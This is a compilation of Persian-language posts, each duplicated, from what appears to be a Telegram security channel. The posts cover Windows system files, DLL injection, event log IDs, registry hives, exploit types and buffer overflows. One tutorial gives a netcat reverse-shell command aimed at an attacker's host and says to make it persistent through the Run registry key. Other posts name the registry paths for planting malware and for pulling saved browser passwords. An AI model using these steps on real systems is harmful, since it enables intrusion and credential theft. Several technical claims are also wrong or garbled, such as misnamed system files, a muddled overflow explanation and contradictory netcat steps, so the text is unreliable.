سلام
توی این مقاله میخوایم فایل های مهم ویندوز که برای انجام حملات و تست نفوذ به کارمون میاد رو معرفی کنیم :
1-NTDetect .com
این فایل یا به عبارت دقیق تر این نرم افزار کارش تنظیم و استخراج اطلاعاتی مثل زمان و تاریخ و ورودی ها و خروجی ها و درایور ها و... از CMOS است.
2-NetBootdd.sys
این فایل کارش کنترل درایور ها و حافظه های دستگاه هست.
3-NTOSKRNL.exe
این فایل همان هسته ی سیستم عامل ما است.
4-Hall.dll
این فایل یکی از مهم ترین رابط های بین سخت افزار و نرم افزار است.
5-Smss.exe
این فایل سرویس های سیستم عامل رو تنظیم میکنه.
6-winlogon.exe
این فایل عملیات لاگین کاربر به اکانت خودشو نظارت و لاگ برداری میکنه
7-lsass.exe
این فایل سیاست های امنیتی و لاگین کاربر رو مدیریت میکنه
8-explorer.exe
این همان فایلی است که رابط کاربری را مدیریت میکند و اگر proccess این برنامه kill شود رابط کاربری شما از بین میرود تا زمانی که دوباره آنرا راه اندازی کنید
9-crss.exe
این برنامه پردازش ها و رشته ها و نرم افزار های سیستم رو مدیریت میکنه.
🎯در قسمت بعدی لاگ های مهم ویندوز رو برای شما معرفی میکنیم.
شاد و پیروز باشید
@bitsecurityteam
توی این مقاله میخوایم فایل های مهم ویندوز که برای انجام حملات و تست نفوذ به کارمون میاد رو معرفی کنیم :
1-NTDetect .com
این فایل یا به عبارت دقیق تر این نرم افزار کارش تنظیم و استخراج اطلاعاتی مثل زمان و تاریخ و ورودی ها و خروجی ها و درایور ها و... از CMOS است.
2-NetBootdd.sys
این فایل کارش کنترل درایور ها و حافظه های دستگاه هست.
3-NTOSKRNL.exe
این فایل همان هسته ی سیستم عامل ما است.
4-Hall.dll
این فایل یکی از مهم ترین رابط های بین سخت افزار و نرم افزار است.
5-Smss.exe
این فایل سرویس های سیستم عامل رو تنظیم میکنه.
6-winlogon.exe
این فایل عملیات لاگین کاربر به اکانت خودشو نظارت و لاگ برداری میکنه
7-lsass.exe
این فایل سیاست های امنیتی و لاگین کاربر رو مدیریت میکنه
8-explorer.exe
این همان فایلی است که رابط کاربری را مدیریت میکند و اگر proccess این برنامه kill شود رابط کاربری شما از بین میرود تا زمانی که دوباره آنرا راه اندازی کنید
9-crss.exe
این برنامه پردازش ها و رشته ها و نرم افزار های سیستم رو مدیریت میکنه.
🎯در قسمت بعدی لاگ های مهم ویندوز رو برای شما معرفی میکنیم.
شاد و پیروز باشید
@bitsecurityteam
[+] DLL Injection
سلام خدمت همه ی همراهان عزیز Bit Security
طبق نظر سنجی ای که داشتیم میخوایم راجب DLL Injection صحبت کنیم
اما قبل از اینکه DLL Injection رو باز کنیم، اصلا ببینیم که فایل های DLL چی هستند
فایل های DLL یا همون Dynamic Link Library ها فایلی هست که توسط برنامه ها در ویندوز صدا زده میشه تا یک Function ای که برنامه بهش نیاز داره رو از داخل اون فایل DLL صدا بزنه و ازش استفاده کنه، چون لزومی نداره که یک برنامه 0-100 ـش کد زده بشه و اگر یک کاری که می میخوایم انجام بدیم رو قبلا کس دیگه ای کدش رو زده، چرا وقتمون رو روش بزاریم، میایم از همون استفاده میکنیم
یکی از بهترین کار هایی که میشه برای جلوگیری از این نوع حمله هم انجام داد اینه که همیشه یک آنتی ویروس آپدیت شده داشته باشیم (که همه مون میدونیم راه های دور زدن آنتی ویروس مثل راه های رسیدن به خدا بسیار هست) و اینکه برنامه ها رو فقط و فقط از Source های مطمئن دانلود کنیم
حالا DLL Injection چیه، درواقع به فرآیندی که در اون میایم و اجرای یک Process در حال اجرا رو دستکاری میکنیم تا کد مخرب ما رو اجرا کنه (به کمک فایل های DLL)، بهش DLL Injection میگیم
همونطوری هم که از اسمش پیداست درواقع باید کاری کنیم تا برنامه موردنظر ما یک فایل DLL مخرب رو صدا بزنه و اونو به عنوان بخشی از Process خودش اجرا کنه (اینطوری کد مخرب ما هم با اجرای برنامه اجرا میشه)
به طور کلی فرآیند DLL Injection 4 تا مرحله داره
1- به Process موردنظر دسترسی داشته باشیم
2- بخشی از مموری که Process ما داخلش فعالیت میکنه رو Allocate کنیم
3- فایل DLL و یا مسیر کاملش رو داخل Process Memoey کپی کنیم و Memory Address مناسب رو مشخص کنیم
4- به Process دستوراتی بدیم که بره DLL مارو اجرا کنه
به عنوان مثال برای انجام DLL Injection میتونیم از 2 روش پایین استفاده کنیم:
1- DLLs Within Registry key
فایل های DLL که داخل مسیر زیر باشند هر زمانی که Process ای Function ـه Win32 API رو Call کنه اجرا میشند
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs
2- DLLs Within Registry Entry
فایل های DLL که داخل مسیر زیر باشند هر زمانی که Process ای بخواد User32.dll رو Load کنه ، Load میشند
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
@BitSecurityTeam
سلام خدمت همه ی همراهان عزیز Bit Security
طبق نظر سنجی ای که داشتیم میخوایم راجب DLL Injection صحبت کنیم
اما قبل از اینکه DLL Injection رو باز کنیم، اصلا ببینیم که فایل های DLL چی هستند
فایل های DLL یا همون Dynamic Link Library ها فایلی هست که توسط برنامه ها در ویندوز صدا زده میشه تا یک Function ای که برنامه بهش نیاز داره رو از داخل اون فایل DLL صدا بزنه و ازش استفاده کنه، چون لزومی نداره که یک برنامه 0-100 ـش کد زده بشه و اگر یک کاری که می میخوایم انجام بدیم رو قبلا کس دیگه ای کدش رو زده، چرا وقتمون رو روش بزاریم، میایم از همون استفاده میکنیم
یکی از بهترین کار هایی که میشه برای جلوگیری از این نوع حمله هم انجام داد اینه که همیشه یک آنتی ویروس آپدیت شده داشته باشیم (که همه مون میدونیم راه های دور زدن آنتی ویروس مثل راه های رسیدن به خدا بسیار هست) و اینکه برنامه ها رو فقط و فقط از Source های مطمئن دانلود کنیم
حالا DLL Injection چیه، درواقع به فرآیندی که در اون میایم و اجرای یک Process در حال اجرا رو دستکاری میکنیم تا کد مخرب ما رو اجرا کنه (به کمک فایل های DLL)، بهش DLL Injection میگیم
همونطوری هم که از اسمش پیداست درواقع باید کاری کنیم تا برنامه موردنظر ما یک فایل DLL مخرب رو صدا بزنه و اونو به عنوان بخشی از Process خودش اجرا کنه (اینطوری کد مخرب ما هم با اجرای برنامه اجرا میشه)
به طور کلی فرآیند DLL Injection 4 تا مرحله داره
1- به Process موردنظر دسترسی داشته باشیم
2- بخشی از مموری که Process ما داخلش فعالیت میکنه رو Allocate کنیم
3- فایل DLL و یا مسیر کاملش رو داخل Process Memoey کپی کنیم و Memory Address مناسب رو مشخص کنیم
4- به Process دستوراتی بدیم که بره DLL مارو اجرا کنه
به عنوان مثال برای انجام DLL Injection میتونیم از 2 روش پایین استفاده کنیم:
1- DLLs Within Registry key
فایل های DLL که داخل مسیر زیر باشند هر زمانی که Process ای Function ـه Win32 API رو Call کنه اجرا میشند
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs
2- DLLs Within Registry Entry
فایل های DLL که داخل مسیر زیر باشند هر زمانی که Process ای بخواد User32.dll رو Load کنه ، Load میشند
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
@BitSecurityTeam
انواع لاگ ها و لاگ های مهم ویندوز
Windows :
1.Security Log
2.Application Log
3.System Log
4.Forwarded Events Log
5.Application and Service Log
از بین این موارد فقط مورد چهارم نیاز به توضیح داره.
لاگ نوع چهارم مربوط به لاگ هایی هست که از کامپیوتر های دیگه ارسال شده یا کانفیگ هایی که در شبکه روی دیگر کامپیوتر ها اعمال شده و کامپیوتر شده ازش باخبر شده و اونو لاگ کرده.
کد های مهم در لاگ های ویندوز:
4902 :
مربوط به تغییرات پالیسی هایی که توسط auditpol.exe ثبت شده اند.
مهاجم میتونه از ثبت شدن این لاگ ها جلوگیری کنه
4741 :
مربوط به اکانت هایی هست که جدیدا ایجاد شدن. یعنی به ازای هر اکانتی که ایجاد میشه(موفق یا ناموفق) یک لاگ با این کد ثبت میشه.
4782:
مربوط به زمانی هست که دسترسی به هش پسوردها پیداکنیم. یعنی اگه کسی به هش پسوردها دسترسی پیدا کنه یک لاگ ثبت میشه.
4728 :
زمانی که یک عضو به گروه Security-enabled
اضافه بشه یک لاگ با این کد ثبت میشه. چه اون فرآیند نرمال باشه یا غیر نرمال.
‼قسمت بعدی درمورد کلید های رجیستری ویندوز
_________________________________________
@BitSecurityTeam
Windows :
1.Security Log
2.Application Log
3.System Log
4.Forwarded Events Log
5.Application and Service Log
از بین این موارد فقط مورد چهارم نیاز به توضیح داره.
لاگ نوع چهارم مربوط به لاگ هایی هست که از کامپیوتر های دیگه ارسال شده یا کانفیگ هایی که در شبکه روی دیگر کامپیوتر ها اعمال شده و کامپیوتر شده ازش باخبر شده و اونو لاگ کرده.
کد های مهم در لاگ های ویندوز:
4902 :
مربوط به تغییرات پالیسی هایی که توسط auditpol.exe ثبت شده اند.
مهاجم میتونه از ثبت شدن این لاگ ها جلوگیری کنه
4741 :
مربوط به اکانت هایی هست که جدیدا ایجاد شدن. یعنی به ازای هر اکانتی که ایجاد میشه(موفق یا ناموفق) یک لاگ با این کد ثبت میشه.
4782:
مربوط به زمانی هست که دسترسی به هش پسوردها پیداکنیم. یعنی اگه کسی به هش پسوردها دسترسی پیدا کنه یک لاگ ثبت میشه.
4728 :
زمانی که یک عضو به گروه Security-enabled
اضافه بشه یک لاگ با این کد ثبت میشه. چه اون فرآیند نرمال باشه یا غیر نرمال.
‼قسمت بعدی درمورد کلید های رجیستری ویندوز
_________________________________________
@BitSecurityTeam
[+] لاگ های مهم ویندوز
[*] 4649(S): A replay attack was detected.
این لاگ زمانی روی Domain Controller ها Generate میشه که Kerberos پاسخ KRB_AP_ERR_REPEAT رو به Client ای ارسال کرده باشه
به طور کلی Domain Controller ها اطلاعات Ticket های دریافتی رو به صورت cache نگه داری میکنند
حالا اگر یک تیکتی که پارامتر های زیر ـش با تیکت ای که قبلا دریافت شده و Cache شده یکی باشه:
[-] Server Name
[-] Client Name
[-] Time
[-] Microsecond Time
جواب KRB_AP_ERR_REPEAT به Client برمیگرده و لاگ 4649 برامون Generate میشه
این Event نشان دهنده حمله Kerberos Replay Attack هست
اما همیشه نمیتونیم این نتیجه گیری رو داشته باشیم و ممکنه به دلیل Misconfiguration های داخل شبکه هم این Log برامون Generate بشه
اما به طور کلی پیشنهاد میشه این Log تحت نظر قرار بگیره تا علت Generate شدنش مشخص بشه
@BitSecurityTeam
[*] 4649(S): A replay attack was detected.
این لاگ زمانی روی Domain Controller ها Generate میشه که Kerberos پاسخ KRB_AP_ERR_REPEAT رو به Client ای ارسال کرده باشه
به طور کلی Domain Controller ها اطلاعات Ticket های دریافتی رو به صورت cache نگه داری میکنند
حالا اگر یک تیکتی که پارامتر های زیر ـش با تیکت ای که قبلا دریافت شده و Cache شده یکی باشه:
[-] Server Name
[-] Client Name
[-] Time
[-] Microsecond Time
جواب KRB_AP_ERR_REPEAT به Client برمیگرده و لاگ 4649 برامون Generate میشه
این Event نشان دهنده حمله Kerberos Replay Attack هست
اما همیشه نمیتونیم این نتیجه گیری رو داشته باشیم و ممکنه به دلیل Misconfiguration های داخل شبکه هم این Log برامون Generate بشه
اما به طور کلی پیشنهاد میشه این Log تحت نظر قرار بگیره تا علت Generate شدنش مشخص بشه
@BitSecurityTeam
‼هشدار گوگل در مورد آسیب پذیری 0day در اندروید.‼
مشخصات و نمره ی آسیب پذیری:
CVE ID: CVE-2020-11261
CVSS Score: 8.4
Severity: High
Component: Display
این آسیب پذیری بر روی پردازنده ی گرافیکی شرکت کوالکام رخ داده.
یعنی گوشی های اندرویدی با چیپست کوالکام در معرض این آسیب پذیری هستند اما بقیه ی اندرویدی ها هم باید حواسشون جمع باشه
این آسیب پذیری میتونه دسترسی کامل مموری رو به هکر بده برای اجرای حملات و تزریق به مموری
#اخبار_آسیب_پذیری
@Bitsecurityteam
مشخصات و نمره ی آسیب پذیری:
CVE ID: CVE-2020-11261
CVSS Score: 8.4
Severity: High
Component: Display
این آسیب پذیری بر روی پردازنده ی گرافیکی شرکت کوالکام رخ داده.
یعنی گوشی های اندرویدی با چیپست کوالکام در معرض این آسیب پذیری هستند اما بقیه ی اندرویدی ها هم باید حواسشون جمع باشه
این آسیب پذیری میتونه دسترسی کامل مموری رو به هکر بده برای اجرای حملات و تزریق به مموری
#اخبار_آسیب_پذیری
@Bitsecurityteam
🔥 سلام خدمت همه ی همراهان عزیز 🔥
سایت دوباره راه اندازی گردیده و آماده ی استفاده ی شما عزیزان میباشد 💪🏻
https://BitSecurityTeam.com
سایت دوباره راه اندازی گردیده و آماده ی استفاده ی شما عزیزان میباشد 💪🏻
https://BitSecurityTeam.com
در شبکه های وایرلس کدام یک از فریم های زیر برای مدیریت اطلاعات ارسالی و دریافتی بین AP و کلاینت ها است؟
Anonymous Quiz
30%
Managment Frames
32%
Control Frames
14%
Data Frames
25%
نمی دونم
‼سلام‼
با توجه با کوییزی که مطرح شد قرار بر این شد که انواع فریم های سیستم های وایرلس رو معرفی کنیم.
تا چند ساعت دیگه یک فایل PDF که توسط ما تدوین شده در کانال بارگزاری میشه💪‼
@bitsecurityteam
با توجه با کوییزی که مطرح شد قرار بر این شد که انواع فریم های سیستم های وایرلس رو معرفی کنیم.
تا چند ساعت دیگه یک فایل PDF که توسط ما تدوین شده در کانال بارگزاری میشه💪‼
@bitsecurityteam
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥
همونطور که قول داده بودیم قراره راجع به کلید های رجیستری ویندوز صحبت کنیم.
1. HKEY_Class_root(HKCR)
این ریشه از یکی از ریشه های مهم هست چون قوانین مربوط به drag and drop و شورتکات برنامه ها و رابط کاربری و همچنین موارد مربوطه رو ذخیره میکنه.
2.HKEY_Current_User(HKCU)
این ریشه بسیار مهم و حیاتی محسوب میشه.از جمله اطلاعاتی که توی کلید های این ریشه ذخیره میشه شامل : یوزرهایی که لاگین هستند ،تنظیمات دسکتاپ ، فولدر های شخصی کاربر. داخل این ریشه یک ساب فولدر به نام ران هست به نام RUN که شما میتونید برای ایجاد بکدور روی سیستم تارگت مسیر فایل مخرب یا شل خودتونو اینجا وارد کنید تا هربار که سیستم بوت میشه به طور خودکار بدافزار یا بکدور شما هم اجرا بشه.
3.HKEY_Local_Machine(HKLM)
این ریشه کارش ذخیره ی تنظیمات اصلی سیستم هست. یعنی تنظیمات سیستم عامل اینجا ذخیره میشه نه تنظیمات مربوط به یوزرها.
4. HKEY_User(HKU)
این مورد پروفایل های کاربران و تنظیمات اون پروفایل هارو ذخیره میکنه.
5.HKEY_Current_Config(HCU)
این قسمت از رحیستری تمام تنظیمات فعلی سیستم رو ذخیره میکنه.
##
اما کاربرد این ها در هک و امنیت :
Malware :
برای کارگزاری بدافزار در رجیستری باید توی این مسیر فایل بدافزار خودتونو وارد کنید تا هربار که پروسه ی مربوط به explorer.exe اجرا میشه به جای فایل اصلی بدافزار شما اجرا میشه.
HKLM\Software\microsoft\WindowsNT\currentVersion\winlogon
Internet Explorer Saved Password:
برای استخراج پسوردهای ذخیره شده ی IE این مسیر را دنبال کنید:
HKCU\Software\Microsoft\Internet Explorer\IntelliForms\SPW
-------------------------------------------------------------
قسمت بعدی درمورد جلوگیری از حملات Null session با رجیستری در ویندوز هست.‼
@bitsecurityteam
همونطور که قول داده بودیم قراره راجع به کلید های رجیستری ویندوز صحبت کنیم.
1. HKEY_Class_root(HKCR)
این ریشه از یکی از ریشه های مهم هست چون قوانین مربوط به drag and drop و شورتکات برنامه ها و رابط کاربری و همچنین موارد مربوطه رو ذخیره میکنه.
2.HKEY_Current_User(HKCU)
این ریشه بسیار مهم و حیاتی محسوب میشه.از جمله اطلاعاتی که توی کلید های این ریشه ذخیره میشه شامل : یوزرهایی که لاگین هستند ،تنظیمات دسکتاپ ، فولدر های شخصی کاربر. داخل این ریشه یک ساب فولدر به نام ران هست به نام RUN که شما میتونید برای ایجاد بکدور روی سیستم تارگت مسیر فایل مخرب یا شل خودتونو اینجا وارد کنید تا هربار که سیستم بوت میشه به طور خودکار بدافزار یا بکدور شما هم اجرا بشه.
3.HKEY_Local_Machine(HKLM)
این ریشه کارش ذخیره ی تنظیمات اصلی سیستم هست. یعنی تنظیمات سیستم عامل اینجا ذخیره میشه نه تنظیمات مربوط به یوزرها.
4. HKEY_User(HKU)
این مورد پروفایل های کاربران و تنظیمات اون پروفایل هارو ذخیره میکنه.
5.HKEY_Current_Config(HCU)
این قسمت از رحیستری تمام تنظیمات فعلی سیستم رو ذخیره میکنه.
##
اما کاربرد این ها در هک و امنیت :
Malware :
برای کارگزاری بدافزار در رجیستری باید توی این مسیر فایل بدافزار خودتونو وارد کنید تا هربار که پروسه ی مربوط به explorer.exe اجرا میشه به جای فایل اصلی بدافزار شما اجرا میشه.
HKLM\Software\microsoft\WindowsNT\currentVersion\winlogon
Internet Explorer Saved Password:
برای استخراج پسوردهای ذخیره شده ی IE این مسیر را دنبال کنید:
HKCU\Software\Microsoft\Internet Explorer\IntelliForms\SPW
-------------------------------------------------------------
قسمت بعدی درمورد جلوگیری از حملات Null session با رجیستری در ویندوز هست.‼
@bitsecurityteam
مواردی که در تست نفوذ شبکه باید بررسی و ارزیابی شوند.
۱. سیستم های تشخیص و جلوگیری از نفوذ
۲. سوییچ های موجود در شبکه
۳. آنتی ویروس ها و سیستم های فیلترینگ محتوا
۴. سیستم های جلوگیری از نشت اطلاعات مثل DLP
۵. پسوردهای کاربران و دستگاه ها از جملا دیفالت پسوردها
۶. شبکه های امن مجازی یا VPN
۷. فایروال ها
۸. روتر های داخل شبکه
۹. سرور شبکه
۱۰.درصورت وجود سیستم اکتیو دایرکتور ،باید آنراهم تست کنیم.
@bitsecurityteam
۱. سیستم های تشخیص و جلوگیری از نفوذ
۲. سوییچ های موجود در شبکه
۳. آنتی ویروس ها و سیستم های فیلترینگ محتوا
۴. سیستم های جلوگیری از نشت اطلاعات مثل DLP
۵. پسوردهای کاربران و دستگاه ها از جملا دیفالت پسوردها
۶. شبکه های امن مجازی یا VPN
۷. فایروال ها
۸. روتر های داخل شبکه
۹. سرور شبکه
۱۰.درصورت وجود سیستم اکتیو دایرکتور ،باید آنراهم تست کنیم.
@bitsecurityteam
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥
توی این آموزش میخوایم ایجاد Backdoor رو با Netcat بررسی کنیم.
♦️اول اینکه Netcat چیه؟
این ابزار که به چاقوی سوئیسی هکر ها مشهوره برای ایجاد ارتباط بین دوتا سیستم از طریق محیط خط فرمان هست(هم ویندوز هم لینوکس)
این ابزار اوپن سرورس و رایگانه.
♦️اما سوال دوم اینکه Backdoor یا همون درب پشتی چیه؟
فرض کنید شما به یک سیستمی حمله کردید و دسترسی گرفتید. اما اگه مدیر اون سرور یا سیستم متوجه بشه و دسترسی شما رو قطع کنه چی میشه؟
تمام زحماتتون بر باد میره.
اما شما میتونید در زمانی که هنوز دسترسی دارید با روش های مختلفی میتونید یک دسترسی ثانویه برای خودتون ایجاد کنید که اگر دسترسی اول از دست رفت دسترسی ثانویه باقی بمونه.
🎯اما روش کار :
در این سناریو تارگت ما ویندوزی هست..🥊
بعد از گرفتن دسترسی باید فایل netcat.exe خودتون رو روی تارگت آپلود کنید.
بعد از آپلود باید این دستور رو توی خط فرمان تارگت وارد کنید :
nc -e cmd.exe <ActtackerIP> <port>
به جای attackerip باید ip سیستم خودتون و به جای port پورت دلخواه خودتونو بزارید.
بعد برای اتصال به بکدور باید این دستور رو روی سیستم خودتون بزنید :
nc -v <targetIP> <port>
که به جای targetip آدرس قربانی و به جای port همون پورتی که روی تارگت تنظیم کردید رو وارد کنید و دسترسی ایجاد میشه.
🚨اما یه نکته و اون اینکه این بکدور دائمی نیست و برای دائمی شدنش باید مسیر فایل nc.exe رو روی سیستم تارگت در رجیستری سیستم وارد کنید تا هربار که سیستم روشن میشه بکدور شما هم اجرا بشه
در این مسیر رجیستری:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
@Bitsecurityteam
توی این آموزش میخوایم ایجاد Backdoor رو با Netcat بررسی کنیم.
♦️اول اینکه Netcat چیه؟
این ابزار که به چاقوی سوئیسی هکر ها مشهوره برای ایجاد ارتباط بین دوتا سیستم از طریق محیط خط فرمان هست(هم ویندوز هم لینوکس)
این ابزار اوپن سرورس و رایگانه.
♦️اما سوال دوم اینکه Backdoor یا همون درب پشتی چیه؟
فرض کنید شما به یک سیستمی حمله کردید و دسترسی گرفتید. اما اگه مدیر اون سرور یا سیستم متوجه بشه و دسترسی شما رو قطع کنه چی میشه؟
تمام زحماتتون بر باد میره.
اما شما میتونید در زمانی که هنوز دسترسی دارید با روش های مختلفی میتونید یک دسترسی ثانویه برای خودتون ایجاد کنید که اگر دسترسی اول از دست رفت دسترسی ثانویه باقی بمونه.
🎯اما روش کار :
در این سناریو تارگت ما ویندوزی هست..🥊
بعد از گرفتن دسترسی باید فایل netcat.exe خودتون رو روی تارگت آپلود کنید.
بعد از آپلود باید این دستور رو توی خط فرمان تارگت وارد کنید :
nc -e cmd.exe <ActtackerIP> <port>
به جای attackerip باید ip سیستم خودتون و به جای port پورت دلخواه خودتونو بزارید.
بعد برای اتصال به بکدور باید این دستور رو روی سیستم خودتون بزنید :
nc -v <targetIP> <port>
که به جای targetip آدرس قربانی و به جای port همون پورتی که روی تارگت تنظیم کردید رو وارد کنید و دسترسی ایجاد میشه.
🚨اما یه نکته و اون اینکه این بکدور دائمی نیست و برای دائمی شدنش باید مسیر فایل nc.exe رو روی سیستم تارگت در رجیستری سیستم وارد کنید تا هربار که سیستم روشن میشه بکدور شما هم اجرا بشه
در این مسیر رجیستری:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
@Bitsecurityteam
[+] آسیب پذیری Buffer OverFolw و انواع آن
آسیب پذیری سر ریز بافر چیست؟
این آسیب پذیری باعث میشود که قسمی از حافظه تحت عنوان بافر پر شود و سرریز کند و همین سر ریز شدن به مهاجم اجازه میده تا کد های مخرب (Malicious Code) خودش رو به عنوان کد اصلی برنامه جا بزنه و از اونجایی که بافر پر شده هیچ گونه بررسی روی کد و Function های اون انجام نمیشه و مستقیم اجرا میشه.
انواع این آسیب پذیری :
× Stack-Based
× Heap-Based
البته دو نوع دیگر هم از این آسیب پذیری وجود داره که توی قسمت بعدی بررسی میشه.
نوع اول یعنی مبتنی بر Stack :
اول اینکه Stack یا پشته چی هست؟
پشته بخشی از ساختار memory هست که زمانی که یک Function فراخوانی میشه یک بلوک از پشته به اون اختصاص پیدا میکنه.
خب تا اینجا مشکلی نیست اما منطق کار پشته هست که مشکل ایجاد میکنه.
منطق پشته LIFO هست.
LIFO = Last In First Out
یعنی آخرین ورودی اولین خروجی هست.
یعنی وقتی پشته پر شد آخرین کد که کد مخرب هکر هست اولین چیزی هست که اجرا میشه و کار تمامه.
نوع دوم مبتنی بر Heap :
اما Heap چیه؟
یک قسمتی از memory هست که برخلاف پشته که به صورت استاتیک کار میکرد این قسمت به صورت داینامیک عمل میکنه.
یعنی هر زمانی که هر بلوکی از هیپ آزاد باشه متغیر های برنامه میتونن اون قسمت رو رزرو کنند.
و همین داینامیک بودن باعث میشه که هکر بتونه کد های مخربشو تزریق کنه به جای کد اصلی .
یعنی هر بار که هیپ پر میشه اگه هکر کد مخرب رو با کد اصلی جایگزین کنه چون هیچگونه بررسی انجام نمیشه مستقیم کد هکر اجرا میشه.
@BitSecurityteam
آسیب پذیری سر ریز بافر چیست؟
این آسیب پذیری باعث میشود که قسمی از حافظه تحت عنوان بافر پر شود و سرریز کند و همین سر ریز شدن به مهاجم اجازه میده تا کد های مخرب (Malicious Code) خودش رو به عنوان کد اصلی برنامه جا بزنه و از اونجایی که بافر پر شده هیچ گونه بررسی روی کد و Function های اون انجام نمیشه و مستقیم اجرا میشه.
انواع این آسیب پذیری :
× Stack-Based
× Heap-Based
البته دو نوع دیگر هم از این آسیب پذیری وجود داره که توی قسمت بعدی بررسی میشه.
نوع اول یعنی مبتنی بر Stack :
اول اینکه Stack یا پشته چی هست؟
پشته بخشی از ساختار memory هست که زمانی که یک Function فراخوانی میشه یک بلوک از پشته به اون اختصاص پیدا میکنه.
خب تا اینجا مشکلی نیست اما منطق کار پشته هست که مشکل ایجاد میکنه.
منطق پشته LIFO هست.
LIFO = Last In First Out
یعنی آخرین ورودی اولین خروجی هست.
یعنی وقتی پشته پر شد آخرین کد که کد مخرب هکر هست اولین چیزی هست که اجرا میشه و کار تمامه.
نوع دوم مبتنی بر Heap :
اما Heap چیه؟
یک قسمتی از memory هست که برخلاف پشته که به صورت استاتیک کار میکرد این قسمت به صورت داینامیک عمل میکنه.
یعنی هر زمانی که هر بلوکی از هیپ آزاد باشه متغیر های برنامه میتونن اون قسمت رو رزرو کنند.
و همین داینامیک بودن باعث میشه که هکر بتونه کد های مخربشو تزریق کنه به جای کد اصلی .
یعنی هر بار که هیپ پر میشه اگه هکر کد مخرب رو با کد اصلی جایگزین کنه چون هیچگونه بررسی انجام نمیشه مستقیم کد هکر اجرا میشه.
@BitSecurityteam
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥
توی این مقاله میخوایم راجع به انواع اکسپلویت ها صحبت کنیم.
به طور کلی سه نوع اکسپلویت داریم :
A. Service Side
نوع اول مبتنی بر سرویس های شبکه هست.
اول ببینیم سرویس و اکسپلویت چیه؟
[1] - سرویس ها در واقع اون نرم افزار ها و خدماتی هستن که به صورت فعال روی سرور از طریق اینترنت یا شبکه محلی قابل دسترس هستند. مثل سرویس FTP یا اکتیو دایرکتوری یا DNS و... هستند مثل اکسپلویت های مربوط به همین آسیب پذیری اخیر به اسم PrintNightmare یا Spooler
حتما متوجه شدید که خیلی از این سرویس ها در واقع همون پروتکل های شبکه هستند.
[2] - اکسپلویت درواقع یک قطعه کد زبان های برنامه نویسی یا مجموعه دستورات پشت سر هم (شل اسکریپت) هست که با اهداف مختلفی روی یک سیستم به عنوان قربانی یا زامبی اجرا میشه.
B. Client Side :
این نوع اکسپلویت مربوط به نرم افزار های نصب شده یا تنظیمات انجام شده روی سیستم قربانی هست. مثلا اکسپلویت مربوط به آسیب پذیری مرورگر کروم یا مدیا پلیر VLC و...
C. Local Privilege Escalation :
دو نوع قبلی بیشتر برای ایجاد دسترسی به سیستم قربانی مورد استفاده قرار میگرفت اما این نوع سوم فقط برای ارتقاء سطح دسترسی در سیستم قربانی مورد استفاده هست. یعنی بعد از گرفتن دسترسی به سیستم قربانی برای اینکه سطح دسترسی خودمون رو به Root در لینوکس یا Administrator یا System در ویندوز ارتقاء بدیم و دسترسی کامل بگیریم به سیستم از این نوع اکسپلویت ها استفاده میکنیم مثل آسیب پذیری که در Sudo لینوکس وجود داشت که باعث میشد مهاجم دسترسی Root داشته باشه بدون مجوز .
موفق و پیروز باشید.
- - - - - - - @Pysecure | @Reza_sarvani - - - - - -
Channel ID : @Bitsecurityteam
توی این مقاله میخوایم راجع به انواع اکسپلویت ها صحبت کنیم.
به طور کلی سه نوع اکسپلویت داریم :
A. Service Side
نوع اول مبتنی بر سرویس های شبکه هست.
اول ببینیم سرویس و اکسپلویت چیه؟
[1] - سرویس ها در واقع اون نرم افزار ها و خدماتی هستن که به صورت فعال روی سرور از طریق اینترنت یا شبکه محلی قابل دسترس هستند. مثل سرویس FTP یا اکتیو دایرکتوری یا DNS و... هستند مثل اکسپلویت های مربوط به همین آسیب پذیری اخیر به اسم PrintNightmare یا Spooler
حتما متوجه شدید که خیلی از این سرویس ها در واقع همون پروتکل های شبکه هستند.
[2] - اکسپلویت درواقع یک قطعه کد زبان های برنامه نویسی یا مجموعه دستورات پشت سر هم (شل اسکریپت) هست که با اهداف مختلفی روی یک سیستم به عنوان قربانی یا زامبی اجرا میشه.
B. Client Side :
این نوع اکسپلویت مربوط به نرم افزار های نصب شده یا تنظیمات انجام شده روی سیستم قربانی هست. مثلا اکسپلویت مربوط به آسیب پذیری مرورگر کروم یا مدیا پلیر VLC و...
C. Local Privilege Escalation :
دو نوع قبلی بیشتر برای ایجاد دسترسی به سیستم قربانی مورد استفاده قرار میگرفت اما این نوع سوم فقط برای ارتقاء سطح دسترسی در سیستم قربانی مورد استفاده هست. یعنی بعد از گرفتن دسترسی به سیستم قربانی برای اینکه سطح دسترسی خودمون رو به Root در لینوکس یا Administrator یا System در ویندوز ارتقاء بدیم و دسترسی کامل بگیریم به سیستم از این نوع اکسپلویت ها استفاده میکنیم مثل آسیب پذیری که در Sudo لینوکس وجود داشت که باعث میشد مهاجم دسترسی Root داشته باشه بدون مجوز .
موفق و پیروز باشید.
- - - - - - - @Pysecure | @Reza_sarvani - - - - - -
Channel ID : @Bitsecurityteam
سلام خدمت همه ی کاربران عزیز تیم امنیتی بیت
توی این سری از مقاله ها میخوایم Tactic ها و Technique های مختلف مهاجمان رو بررسی کنیم، که در اولین مقاله هم به بررسی Tactic ای به نام Persistence میپردازیم
حتما این سری از مقالات رو از دست ندید، چون دید خیلی خوبی از رفتار مهاجمان رو بهتون میده
تاکتیک Persistence چیست؟
Channel ID : @Bitsecurityteam
توی این سری از مقاله ها میخوایم Tactic ها و Technique های مختلف مهاجمان رو بررسی کنیم، که در اولین مقاله هم به بررسی Tactic ای به نام Persistence میپردازیم
حتما این سری از مقالات رو از دست ندید، چون دید خیلی خوبی از رفتار مهاجمان رو بهتون میده
تاکتیک Persistence چیست؟
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
تاکتیک Persistence چیست؟ - تیم امنیتی بیت Tactics - تاکتیک Persistence چیست؟
